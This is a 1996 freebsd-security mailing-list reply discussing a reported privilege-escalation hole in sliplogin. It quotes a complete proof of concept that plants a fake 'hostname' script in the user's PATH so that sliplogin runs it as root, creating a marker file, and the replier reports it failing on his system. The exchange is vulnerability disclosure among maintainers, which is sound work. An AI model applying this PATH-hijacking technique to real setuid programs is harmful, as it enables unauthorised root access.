Date:      Mon, 12 Feb 1996 09:54:44 -0700
From:      Nate Williams <nate@sri.MT.net>
To:        Michael Constant <mconst@ocf.Berkeley.EDU>
Cc:        mconst@csua.berkeley.edu, nate@sri.MT.net, freebsd-security@freebsd.org
Subject:   Re: sliplogin hole?

> Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which
> is just as insecure as not changing the path at all :-)  But thanks for
> pointing out my misconception.

Hmmm.....  Maybe I am confused, although I see that piece of code used
in the 'sh' sources.

> The exploit as I stated it does work; it's written out in full below,
> in case I didn't explain it clearly in my original letter.
>
> jrl@host% cd ~/bin
> jrl@host% cat > hostname
> #! /bin/sh
> touch /etc/i-am-root
> /bin/hostname
> ^D
> jrl@host% chmod 755 hostname
> jrl@host% sliplogin Sjrl
> starting slip login for Sjrl
>
> ... and by this point, the deed is done.

I just tried this, and it didn't work on my box although I was allowed
to run sliplogin.  It dies with:
sliplogin[953]: ioctl (TIOCSCTTY): Operation not permitte

Which might not occur on a dial-in line.  Unfortunately, I'm unable to
test this out right now, but I will try it out from home.

Nate